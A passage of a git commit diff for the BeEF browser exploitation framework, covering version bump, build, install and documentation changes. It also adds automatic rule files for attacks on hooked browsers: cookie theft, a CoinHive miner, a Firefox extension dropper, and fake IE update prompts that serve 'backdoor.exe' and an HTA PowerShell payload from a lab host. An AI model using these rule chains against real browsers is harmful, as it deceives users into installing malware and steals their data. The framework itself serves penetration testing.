Bump version to 0.4.7.2-alpha

proxy:ignore case when ignoring headers

.github/ISSUE_TEMPLATE.md

@@ -0,0 +1,49 @@
+Verify first that your issue/request has not been posted previously:
+
+* https://github.com/beefproject/beef/issues
+* https://github.com/beefproject/beef/wiki/FAQ
+
+Ensure you're using the [latest version of BeEF](https://github.com/beefproject/beef/releases/tag/beef-0.4.7.2).
+
+
+#### Environment
+
+What version/revision of BeEF are you using?
+
+On what version of Ruby?
+
+On what browser?
+
+On what operating system?
+
+
+#### Configuration
+
+Are you using a non-default configuration?
+
+Have you enabled or disabled any BeEF extensions?
+
+
+#### Summary
+
+Please provide a summary of the issue.
+
+
+#### Expected Behaviour
+
+What was the expected result?
+
+
+#### Actual Behaviour
+
+What was the actual result?
+
+
+#### Steps to Reproduce
+
+Please provide steps to reproduce this issue.
+
+
+#### Additional Information
+
+Please provide any additional information which may be useful in resolving this issue, such as debugging output and relevant screen shots. Debug output can be enabled by specifying `debug: true` in the `config.yaml` configuration file.

.gitignore

@@ -1,8 +1,106 @@
+### BeEF ###
 beef.db
 test/msf-test
+extensions/admin_ui/media/javascript-min/
 custom-config.yaml
 .DS_Store
 .gitignore
 .rvmrc
 
 *.lock
+
+extensions/metasploit/msf-exploits.cache
+
+# The following lines were created by https://www.gitignore.io
+
+### Linux ###
+*~
+
+# KDE directory preferences
+.directory
+
+
+### vim ###
+[._]*.s[a-w][a-z]
+[._]s[a-w][a-z]
+*.un~
+Session.vim
+.netrwhist
+*~
+
+
+### Emacs ###
+# -*- mode: gitignore; -*-
+*~
+\#*\#
+/.emacs.desktop
+/.emacs.desktop.lock
+*.elc
+auto-save-list
+tramp
+.\#*
+
+# Org-mode
+.org-id-locations
+*_archive
+
+# flymake-mode
+*_flymake.*
+
+# eshell files
+/eshell/history
+/eshell/lastdir
+
+# elpa packages
+/elpa/
+
+# reftex files
+*.rel
+
+# AUCTeX auto folder
+/auto/
+
+# cask packages
+.cask/
+
+
+### nanoc ###
+# For projects using nanoc (http://nanoc.ws/)
+
+# Default location for output, needs to match output_dir's value found in config.yaml
+output/
+
+# Temporary file directory
+tmp/
+
+# Crash Log
+crash.log
+
+
+### Windows ###
+# Windows image file caches
+Thumbs.db
+ehthumbs.db
+
+# Folder config file
+Desktop.ini
+
+# Recycle Bin used on file shares
+$RECYCLE.BIN/
+
+# Windows Installer files
+*.cab
+*.msi
+*.msm
+*.msp
+
+# Windows shortcuts
+*.lnk
+
+
+### TortoiseGit ###
+# Project-level settings
+/.tgitconfig
+
+test/thirdparty/msf/unit/.byebug_history
+/load

.rubocop.yml

@@ -0,0 +1,24 @@
+AllCops:
+  Exclude:
+    - 'test/**/*'
+    - 'tmp/**/*'
+    - 'tools/**/*'
+    - 'doc/**/*'
+  TargetRubyVersion: 2.4
+
+Metrics/AbcSize:
+  Enabled: false
+Metrics/BlockLength:
+  Enabled: false
+Metrics/ClassLength:
+  Enabled: false
+Metrics/LineLength:
+  Enabled: false
+Metrics/MethodLength:
+  Enabled: false
+Metrics/PerceivedComplexity:
+  Enabled: false
+Metrics/CyclomaticComplexity:
+  Enabled: false
+Style/FrozenStringLiteralComment:
+  Enabled: false

.ruby-gemset

@@ -0,0 +1 @@
+beef

.ruby-version

@@ -0,0 +1 @@
+2.5.3

.travis.yml

@@ -0,0 +1,23 @@
+language: ruby
+rvm:
+  - 2.4.0
+  - 2.5.0
+  - 2.6.0
+env:
+  - "BEEF_TEST=true"
+notifications:
+  email:
+    recipients:
+      - wade@bindshell.net
+    on_success: always
+    on_failure: always
+addons:
+  apt:
+    packages:
+      - libsqlite3-dev
+      - build-essential
+      - patch
+      - ruby-dev
+      - zlib1g-dev
+      - liblzma-dev
+      - libcurl4-openssl-dev

BeEFLive.sh

@@ -1,2 +0,0 @@
-# Reference for old (<1.2) versions of BeEF Live
-bash /opt/beef/liveCD/BeEFLive.sh

Gemfile

@@ -1,55 +1,101 @@
 # BeEF's Gemfile
 
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
-# Gems only required on Windows, or with specific Windows issues
-if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
-  gem "win32console"
+gem 'eventmachine'
+gem 'thin'
+gem 'sinatra', '~> 2.0'
+gem 'rack', '~> 2.0'
+gem 'rack-protection', '~> 2.0'
+gem 'em-websocket' # WebSocket support
+gem 'uglifier'
+gem 'mime-types'
+gem 'execjs'
+gem 'ansi'
+gem 'term-ansicolor', :require => 'term/ansicolor'
+gem 'dm-core'
+gem 'json'
+gem 'data_objects'
+gem 'rubyzip', '>= 1.2.2'
+gem 'espeak-ruby', '>= 1.0.4' # Text-to-Voice
+gem 'nokogiri', '>= 1.7'
+gem 'rake'
+
+# SQLite support
+group :sqlite do
+  gem 'dm-sqlite-adapter'
 end
 
-gem "eventmachine", "1.0.3"
-gem "thin"
-gem "sinatra", "1.4.2"
-gem "rack", "1.5.2"
-gem "em-websocket", "~> 0.3.6"
-gem "uglifier", "~> 2.2.1"
-# install https://github.com/cowboyd/therubyracer if the OS is != than OSX
-if !RUBY_PLATFORM.downcase.include?("darwin")
-  gem "therubyracer", "~> 0.12.0"
-end
-gem "ansi"
-gem "term-ansicolor", :require => "term/ansicolor"
-gem "dm-core"
-gem "json"
-gem "data_objects"
-gem "dm-sqlite-adapter"
-gem "parseconfig"
-gem "erubis"
-gem "dm-migrations"
-gem "msfrpc-client"
-gem "rubyzip", "~> 1.0.0"
-
-# notifications
-gem "twitter"
-
-if ENV['BEEF_TEST']
-# for running unit tests
-  gem "test-unit"
-  gem "test-unit-full"
-  gem "curb"
-  gem "test-unit"
-  gem "selenium"
-  gem "selenium-webdriver"
-  # nokogirl is needed by capybara which may require one of the below commands
-  # sudo apt-get install libxslt-dev libxml2-dev
-  # sudo port install libxml2 libxslt
-  gem "capybara"
-  #RESTful API tests/generic command module tests
-  gem "rest-client", "~> 1.6.7"
+# PostgreSQL support
+group :postgres do
+  #gem dm-postgres-adapter
 end
 
-source "http://rubygems.org"
+# MySQL support
+group :mysql do
+  #gem dm-mysql-adapter
+end
+
+# Geolocation support
+group :geoip do
+  gem 'maxmind-db'
+end
+
+gem 'parseconfig'
+gem 'erubis'
+gem 'dm-migrations'
+
+# Metasploit Integration extension
+group :ext_msf do
+  gem 'msfrpc-client'
+  gem 'xmlrpc'
+end
+
+# Notifications extension
+group :ext_notifications do
+  # Pushover
+  gem 'rushover'
+  # Slack
+  gem 'slack-notifier'
+  # Twitter
+  gem 'twitter', '>= 5.0.0'
+end
+
+# DNS extension
+group :ext_dns do
+  gem 'rubydns', '~> 0.7.3'
+end
+
+# QRcode extension
+group :ext_qrcode do
+  gem 'qr4r'
+end
+
+# For running unit tests
+group :test do
+  if ENV['BEEF_TEST']
+    gem 'test-unit'
+    gem 'test-unit-full'
+    gem 'rspec'
+	gem 'rdoc'
+    # curb gem requires curl libraries
+    # sudo apt-get install libcurl4-openssl-dev
+    gem 'curb'
+    # selenium-webdriver 3.x is incompatible with Firefox version 48 and prior
+    gem 'selenium'
+    gem 'selenium-webdriver', '~> 2.53.4'
+    # nokogirl is needed by capybara which may require one of the below commands
+    # sudo apt-get install libxslt-dev libxml2-dev
+    # sudo port install libxml2 libxslt
+    gem 'capybara'
+    # RESTful API tests/generic command module tests
+    gem 'rest-client', '>= 2.0.1'
+    gem 'byebug'
+  end
+end
+
+source 'https://rubygems.org'

INSTALL.txt

@@ -1,71 +1,71 @@
 ===============================================================================
    
-    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
 ===============================================================================
 
+Source
+------
+
+Obtain application source code either by downloading the latest archive:
+
+  $ wget https://github.com/beefproject/beef/archive/master.zip
+
+Or cloning the Git repository from Github:
+
+  $ git clone https://github.com/beefproject/beef
+
+
+Prerequisites
+--------------
+
+BeEF requires Ruby 2.4+.
+
+If your operating system package manager does not support Ruby version 2.4,
+you can add the brightbox ppa repository for the latest version of Ruby:
+
+  $ sudo apt-add-repository -y ppa:brightbox/ruby-ng
+
+Alternatively, consider using a Ruby environment manager such as rbenv or rvm
+to manager your Ruby versions. Refer to the following for more information:
+
+  * rbenv: https://github.com/rbenv/rbenv
+  * rvm: https://rvm.io/rvm/install
+
+
 Installation
 ------------
 
-   1. Prerequisites (platform independent)
-   2. Prerequisites (Windows)
-   3. Prerequisites (Linux)
-   4. Prerequisites (Mac OSX)
-   5. Install instructions
-   6. Run instructions
+Once Ruby is installed, run the install script in the BeEF directory:
+
+  ./install
+
+This script installs the required operating system packages and all the
+prerequisite Ruby gems.
+
+Upon successful installation, be sure to read the Configuration page
+on the wiki for important details on configuring and securing BeEF.
+
+  https://github.com/beefproject/beef/wiki/Configuration
 
 
+Start BeEF
+----------
 
-   1. Prerequisites (platform independent)
+To start BeEF, simply run:
 
-      BeEF requires ruby 1.9 and the "bundler" gem. Bundler can be installed by:
+  $ ./beef
 
-      gem install bundler
 
-      
-   2. Prerequisites (Windows)
-      
-      Windows requires the sqlite.dll.  Simply grab the zip file below and extract it to your Ruby bin directory:
+Updating
+--------
 
-	  http://www.sqlite.org/sqlitedll-3_7_0_1.zip
-      
+Due to the fast-paced nature of web browser development and webappsec landscape,
+it's best to regularly update BeEF to the latest version.
 
-   3. Prerequisites (Linux)
+If you're using BeEF from the GitHub repository, updating is as simple as:
 
-      !!! This must be done PRIOR to running the bundle install command !!!
-      
-      On linux you will need to find the packages specific to your distribution for sqlite.  An example for Ubuntu systems is:
+  $ git pull
 
-      3.0. sudo apt-get install libsqlite3-dev sqlite3 sqlite3-doc
-      3.1. install rvm from rvm.beginrescueend.com, this takes care of the various incompatable and conflicting ruby packages that are required
-      3.2. rvm install 1.9.2
-      3.3. rvm use 1.9.2
-	  
-   4. Prerequisites (Mac OSX)
-   
-      - XCode: provides the sqlite support BeEF needs
-      
-      - Ruby 1.9
-      	To install RVM and Ruby 1.9.3 on Mac OS:  
-      	$ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile 
-      	$ rvm install 1.9.3-p0 --with-gcc=clang
-		$ rvm use 1.9.3
-      
-
-   5. Install instructions
-   
-      Obtain application code either by downloading an archive from https://github.com/beefproject/beef/zipball/master or cloning the GIT repo git@github.com:beefproject/beef.git
-
-	  Navigate to the ruby source directory and run:
-
-	  bundle install
-
-      Bundler installs all the pre-requisite gems.
-
-   6. Run instructions
-
-      Simply run:
-
-      ./beef

README

@@ -1,74 +0,0 @@
-===============================================================================
-   
-    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-    Browser Exploitation Framework (BeEF) - http://beefproject.com
-    See the file 'doc/COPYING' for copying permission
-
-===============================================================================
-
-What is BeEF?
--------------
-
-BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
-
-Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
-
-
-Get Involved 
-------------
-
-You can get in touch with the BeEF team. Just check out the following: 
-
-
-Please, send us pull requests!
-
-Web: http://beefproject.com/
-
-Mail: beef-subscribe@bindshell.net
-
-IRC: ircs://irc.freenode.net/beefproject
-
-Twitter: @beefproject
-
-
-Requirements
-------------
-
-* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
-* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
-* [SQLite](http://sqlite.org) 3.x
-* The following GEMS: 
-   - bundler 
-   - thin
-   - Sinatra 
-   - ANSI 
-   - TERM-ANSIcolor 
-   - dm-core 
-   - json 
-   - data_objects 
-   - dm-sqlite-adapter 
-   - parseconfig 
-   - erubis 
-   - dm-migrations 
-   - msfrpc-client 
-   - eventmachine
-   - win32console (Windows Only)
-
-
-Quick Start
------------ 
-
-__The following is for the impatient.__ 
-
-For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
-
-   $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
-
-
-Usage 
------ 
-
-To get started, simply execute beef and follow the instrustions: 
-
-   $ ./beef
-

README.md

@@ -1,6 +1,6 @@
 ===============================================================================
-   
-    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+
+    Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
@@ -14,17 +14,19 @@ __BeEF__ is short for __The Browser Exploitation Framework__. It is a penetratio
 Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
 
 
-Get Involved 
+Get Involved
 ------------
 
-You can get in touch with the BeEF team. Just check out the following: 
+You can get in touch with the BeEF team. Just check out the following:
 
 
 __Please, send us pull requests!__
 
-__Web:__ http://beefproject.com/
+__Web:__ https://beefproject.com/
 
-__Mail:__ beef-subscribe@bindshell.net
+__Bugs:__ https://github.com/beefproject/beef/issues
+
+__Security Bugs:__ security@beefproject.com
 
 __IRC:__ ircs://irc.freenode.net/beefproject
 
@@ -34,44 +36,37 @@ __Twitter:__ @beefproject
 Requirements
 ------------
 
-* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
-* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
-* [SQLite](http://sqlite.org) 3.x
-* The following GEMS: 
-   - bundler 
-   - thin
-   - Sinatra 
-   - ANSI 
-   - TERM-ANSIcolor 
-   - dm-core 
-   - json 
-   - data_objects 
-   - dm-sqlite-adapter 
-   - parseconfig 
-   - erubis 
-   - dm-migrations 
-   - msfrpc-client 
-   - eventmachine
-   - win32console (Windows Only)
+* Operating System: Mac OSX 10.5.0 or higher / modern Linux. Note: Windows is not supported.
+* [Ruby](http://ruby-lang.org): 2.4 or newer
+* [SQLite](http://sqlite.org): 3.x
+* [Node.js](https://nodejs.org): 6 or newer
+* The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile
+* Selenium is required on OSX: brew install selenium-server-standalone (See https://github.com/shvets/selenium)
 
 
 Quick Start
------------ 
+-----------
 
-__The following is for the impatient.__ 
+__The following is for the impatient.__
 
-For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
+The `install` script installs the required operating system packages and all the prerequisite Ruby gems:
 
-       $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
+```
+$ ./install
+```
+
+For full installation details, please refer to [INSTALL.txt](https://github.com/beefproject/beef/blob/master/INSTALL.txt).
+
+We also have an [Installation](https://github.com/beefproject/beef/wiki/Installation) page on the wiki.
+
+Upon successful installation, be sure to read the [Configuration](https://github.com/beefproject/beef/wiki/Configuration) page on the wiki for important details on configuring and securing BeEF.
 
 
-Usage 
------ 
+Usage
+-----
 
-To get started, simply execute beef and follow the instructions: 
+To get started, simply execute beef and follow the instructions:
 
-       $ ./beef
-
-On windows use
-
-      $ ruby beef
+```
+$ ./beef
+```

Rakefile

@@ -1,21 +1,23 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
+require 'yaml'
+#require 'pry-byebug'
 
 task :default => ["quick"]
 
 desc "Run quick tests"
 task :quick do
-  Rake::Task['unit'].invoke                 # run unit tests
+  Rake::Task['unit'].invoke # run unit tests
 end
 
 desc "Run all tests"
 task :all do
-  Rake::Task['integration'].invoke          # run integration tests
-  Rake::Task['unit'].invoke                 # run unit tests
-  Rake::Task['msf'].invoke                  # run msf tests
+  Rake::Task['integration'].invoke # run integration tests
+  Rake::Task['unit'].invoke # run unit tests
+  Rake::Task['msf'].invoke # run msf tests
 end
 
 desc "Run automated tests (for Jenkins)"
@@ -38,17 +40,85 @@ task :unit => ["install"] do
 end
 
 desc "Run MSF unit tests"
-task :msf => ["install", "msf_install"]  do
+task :msf => ["install", "msf_install"] do
   Rake::Task['msf_update'].invoke
   Rake::Task['msf_start'].invoke
   sh "cd test/thirdparty/msf/unit/;ruby -W0 ts_metasploit.rb"
   Rake::Task['msf_stop'].invoke
 end
 
-task :install do
-  sh "export BEEF_TEST=true;bundle install"
+desc 'Generate API documentation to doc/rdocs/index.html'
+task :rdoc do
+  Rake::Task['rdoc:rerdoc'].invoke
 end
 
+desc 'rest test examples'
+task :rest_test do
+  Rake::Task['beef_start'].invoke
+
+  sh 'cd test/api/; ruby -W2 1333_auth_rate.rb'
+
+  Rake::Task['beef_stop'].invoke
+end
+
+################################
+# SSL/TLS certificate
+
+namespace :ssl do
+  desc 'Create a new SSL certificate'
+  task :create do
+    if File.file?('beef_key.pem')
+      puts 'Certificate already exists. Replace? [Y/n]'
+      confirm = STDIN.getch.chomp
+      unless confirm.eql?('') || confirm.downcase.eql?('y')
+        puts "Aborted"
+        exit 1
+      end
+    end
+    Rake::Task['ssl:replace'].invoke
+  end
+
+  desc 'Re-generate SSL certificate'
+  task :replace do
+    if File.file?('/usr/local/bin/openssl')
+      path = '/usr/local/bin/openssl'
+    elsif File.file?('/usr/bin/openssl')
+      path = '/usr/bin/openssl'
+    else
+      puts "[-] Error: could not find openssl"
+      exit 1
+    end
+    IO.popen([path, 'req', '-new', '-newkey', 'rsa:4096', '-sha256', '-x509', '-days', '3650', '-nodes', '-out', 'beef_cert.pem', '-keyout', 'beef_key.pem', '-subj', '/CN=localhost'], 'r+').read.to_s
+  end
+end
+
+################################
+# rdoc
+
+namespace :rdoc do
+  require 'rdoc/task'
+
+  desc 'Generate API documentation to doc/rdocs/index.html'
+  Rake::RDocTask.new do |rd|
+    rd.rdoc_dir = 'doc/rdocs'
+    rd.main = 'README.mkd'
+    rd.rdoc_files.include('core/**/*\.rb')
+      #'extensions/**/*\.rb'
+      #'modules/**/*\.rb'
+    rd.options << '--line-numbers'
+    rd.options << '--all'
+  end
+end
+
+
+################################
+# Install
+
+#task :install do
+#  sh "export BEEF_TEST=true"
+#end
+
+
 ################################
 # X11 set up
 
@@ -57,7 +127,7 @@ end
 task :xserver_start do
   printf "Starting X11 Server (wait 10 seconds)..."
   @xserver_process_id = IO.popen("/usr/bin/Xvfb :0 -screen 0 1024x768x24 2> /dev/null", "w+")
-  delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
+  delays = [2, 2, 1, 1, 1, 0.5, 0.5, 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
   delays.each do |i| # delay for 10 seconds
     printf '.'
     sleep (i) # increase the . display rate
@@ -67,28 +137,54 @@ end
 
 task :xserver_stop do
   puts "\nShutting down X11 Server...\n"
-  sh "ps -ef|grep Xvfb|grep -v grep|awk '{print $2}'|xargs kill"
+  sh "ps -ef|grep Xvfb|grep -v grep|grep -v rake|awk '{print $2}'|xargs kill"
 end
 
 ################################
 # BeEF environment set up
 
 @beef_process_id = nil;
+@beef_config_file = 'tmp/rk_beef_conf.yaml';
+
 
 task :beef_start => 'beef' do
+  # read environment param for creds or use bad_fred
+  test_user = ENV['TEST_BEEF_USER'] || 'bad_fred'
+  test_pass = ENV['TEST_BEEF_PASS'] || 'bad_fred_no_access'
+
+  # write a rake config file for beef
+  config = YAML.load(File.read('./config.yaml'))
+  config['beef']['credentials']['user'] = test_user
+  config['beef']['credentials']['passwd'] = test_pass
+  Dir.mkdir('tmp') unless Dir.exists?('tmp')
+  File.open(@beef_config_file, 'w') { |f| YAML.dump(config, f) }
+
+  # set the environment creds -- in case we're using bad_fred
+  ENV['TEST_BEEF_USER'] = test_user
+  ENV['TEST_BEEF_PASS'] = test_pass
+  config = nil
+  puts "Using config file: #{@beef_config_file}\n"
+
   printf "Starting BeEF (wait a few seconds)..."
-  @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
-  delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
+  @beef_process_id = IO.popen("ruby ./beef -c #{@beef_config_file} -x 2> /dev/null", "w+")
+  delays = [5, 5, 5, 4, 4, 3, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1]
   delays.each do |i| # delay for a few seconds
     printf '.'
     sleep (i)
   end
-  puts '.'
+  puts ".\n\n"
 end
 
 task :beef_stop do
-  puts "\nShutting down BeEF...\n"
-  sh "ps -ef|grep beef|grep -v grep|awk '{print $2}'|xargs kill"
+  # cleanup tmp/config files
+  puts "\nCleanup config file:\n"
+  rm_f @beef_config_file
+  ENV['TEST_BEEF_USER'] = nil
+  ENV['TEST_BEEF_PASS'] = nil
+
+  # shutting down
+  puts "Shutting down BeEF...\n"
+  sh "ps -ef|grep beef|grep -v grep|grep -v rake|awk '{print $2}'|xargs kill"
 end
 
 ################################
@@ -99,7 +195,7 @@ end
 task :msf_start => '/tmp/msf-test/msfconsole' do
   printf "Starting MSF (wait 45 seconds)..."
   @msf_process_id = IO.popen("/tmp/msf-test/msfconsole -r test/thirdparty/msf/unit/BeEF.rc 2> /dev/null", "w+")
-  delays = [10, 7, 6, 5, 4, 3, 2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
+  delays = [10, 7, 6, 5, 4, 3, 2, 2, 1, 1, 1, 0.5, 0.5, 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
   delays.each do |i| # delay for 45 seconds
     printf '.'
     sleep (i) # increase the . display rate
@@ -116,7 +212,7 @@ task :msf_install => '/tmp/msf-test/msfconsole' do
   # Handled by the 'test/msf-test/msfconsole' task.
 end
 
-task :msf_update  => '/tmp/msf-test/msfconsole' do
+task :msf_update => '/tmp/msf-test/msfconsole' do
   sh "cd /tmp/msf-test;git pull"
 end
 
@@ -145,7 +241,7 @@ end
 
 ################################
 # Create CDE Package
-# This will download and make the CDE Executable and 
+# This will download and make the CDE Executable and
 # gnereate a CDE Package in cde-package
 
 task :cde do
@@ -159,10 +255,10 @@ task :cde do
   Rake::Task['cde_beef_start'].invoke
   Rake::Task['beef_stop'].invoke
   puts "\nCleaning Up...\n";
-  sleep (2);	
+  sleep (2);
   sh "rm -rf CDE";
   puts "\nCDE Package Created...\n";
- end
+end
 
 ################################
 # CDE/BeEF environment set up
@@ -172,7 +268,7 @@ task :cde do
 task :cde_beef_start => 'beef' do
   printf "Starting CDE BeEF (wait 10 seconds)..."
   @beef_process_id = IO.popen("./CDE/cde ruby beef -x 2> /dev/null", "w+")
-  delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
+  delays = [2, 2, 1, 1, 1, 0.5, 0.5, 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
   delays.each do |i| # delay for 10 seconds
     printf '.'
     sleep (i)
@@ -182,5 +278,3 @@ end
 
 
 ################################
-
-

VERSION

@@ -1,7 +1,7 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.8-alpha
+0.4.7.2-alpha

arerules/alert.json

@@ -0,0 +1,18 @@
+{"name": "Display an alert",
+  "author": "mgeeky",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "alert_dialog",
+      "condition": null,
+      "options": {
+        "text":"You've been BeEFed ;>"
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}

arerules/c_osx_test-return-mods.json

@@ -0,0 +1,35 @@
+{
+  "name": "Test return debug stuff",
+  "author": "antisnatchor",
+  "browser": "S",
+  "browser_version": ">= 7",
+  "os": "OSX",
+  "os_version": "<= 10.10",
+  "modules": [{
+    "name": "test_return_ascii_chars",
+    "condition": null,
+    "options": {}
+  }, {
+    "name": "test_return_long_string",
+    "condition": "status==1",
+    "code": "var mod_input=test_return_ascii_chars_mod_output + '--(CICCIO)--';",
+    "options": {
+      "repeat": "10",
+      "repeat_string": "<<mod_input>>"
+    }
+  },
+    {
+      "name": "alert_dialog",
+      "condition": "status=1",
+      "code": "var mod_input=test_return_long_string_mod_output + '--(PASTICCIO)--';",
+      "options":{"text":"<<mod_input>>"}
+    },
+   {
+    "name": "get_page_html",
+    "condition": null,
+    "options": {}
+  }],
+  "execution_order": [0, 1, 2, 3],
+  "execution_delay": [0, 0, 0, 0],
+  "chain_mode": "nested-forward"
+}

arerules/coinhive_miner.json

@@ -0,0 +1,20 @@
+{"name": "Start CoinHive JavaScript miner",
+  "author": "bcoles",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "coinhive_miner",
+      "condition": null,
+      "options": {
+        "public_token":"Ofh5MIvjuCBDqwJ9TCTio7TYko0ig5TV",
+        "mode":"FORCE_EXCLUSIVE_TAB",
+        "mobile_enabled":""
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}

arerules/confirm_close_tab.json

@@ -0,0 +1,20 @@
+{"name": "Confirm Close Tab",
+  "author": "mgeeky",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "confirm_close_tab",
+      "condition": null,
+      "code": null,
+      "options": {
+        "text":"Are you sure you want to navigate away from this page?",
+        "usePopUnder":"true"
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}

arerules/enabled/README

@@ -0,0 +1,2 @@
+Move here the ARE rule files that you want to pre-load when BeEF starts.
+Make sure they are .json files (any other file extension is ignored).

arerules/ff_osx_extension-dropper.json

@@ -0,0 +1,20 @@
+{
+  "name": "Firefox Extension Dropper",
+  "author": "antisnatchor",
+  "browser": "FF",
+  "browser_version": "ALL",
+  "os": "OSX",
+  "os_version": ">= 10.8",
+  "modules": [{
+    "name": "firefox_extension_dropper",
+    "condition": null,
+    "options": {
+      "extension_name": "Ummeneske",
+      "xpi_name": "Ummeneske",
+      "base_host": "http://172.16.45.1:3000"
+    }
+  }],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}

arerules/get_cookie.json

@@ -0,0 +1,18 @@
+{
+  "name": "Get Cookie",
+  "author": "@benichmt1",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "get_cookie",
+      "condition": null,
+      "options": {
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}

arerules/ie_win_fakenotification-clippy.json

@@ -0,0 +1,31 @@
+{
+  "name": "Ie Fake Notification + Clippy",
+  "author": "antisnatchor",
+  "browser": "IE",
+  "browser_version": "== 11",
+  "os": "Windows",
+  "os_version": ">= 7",
+  "modules": [
+    {
+      "name": "fake_notification",
+      "condition": null,
+      "options": {
+        "notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please update it."
+      }
+    }
+  ,{
+      "name": "clippy",
+      "condition": null,
+      "options": {
+        "clippydir": "http://172.16.45.1:3000/clippy/",
+        "askusertext": "Your browser appears to be out of date. Would you like to upgrade it?",
+        "executeyes": "http://172.16.45.1:3000/updates/backdoor.exe",
+        "respawntime":"5000",
+        "thankyoumessage":"Thanks for upgrading your browser! Look forward to a safer, faster web!"
+      }
+    }
+  ],
+  "execution_order": [0,1],
+  "execution_delay": [0,2000],
+  "chain_mode": "sequential"
+}

arerules/ie_win_htapowershell.json

@@ -0,0 +1,27 @@
+{
+  "name": "HTA PowerShell",
+  "author": "antisnatchor",
+  "browser": "IE",
+  "browser_version": "ALL",
+  "os": "Windows",
+  "os_version": ">= 7",
+  "modules": [
+    {
+      "name": "fake_notification",
+      "condition": null,
+      "options": {
+        "notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please apply the Microsoft Update below:"
+      }
+    },
+    {
+      "name": "hta_powershell",
+      "condition": null,
+      "options": {
+        "domain":"http://172.16.45.1:3000",
+        "ps_url":"/ps"
+      }
+    }],
+  "execution_order": [0,1],
+  "execution_delay": [0,500],
+  "chain_mode": "sequential"
+}

arerules/ie_win_missingflash-prettytheft.json

@@ -0,0 +1,27 @@
+{
+  "name": "Fake missing plugin + Pretty Theft LinkedIn",
+  "author": "antisnatchor",
+  "browser": "IE",
+  "browser_version": ">= 8",
+  "os": "Windows",
+  "os_version": "== XP",
+  "modules": [{
+    "name": "fake_notification_c",
+    "condition": null,
+    "options": {
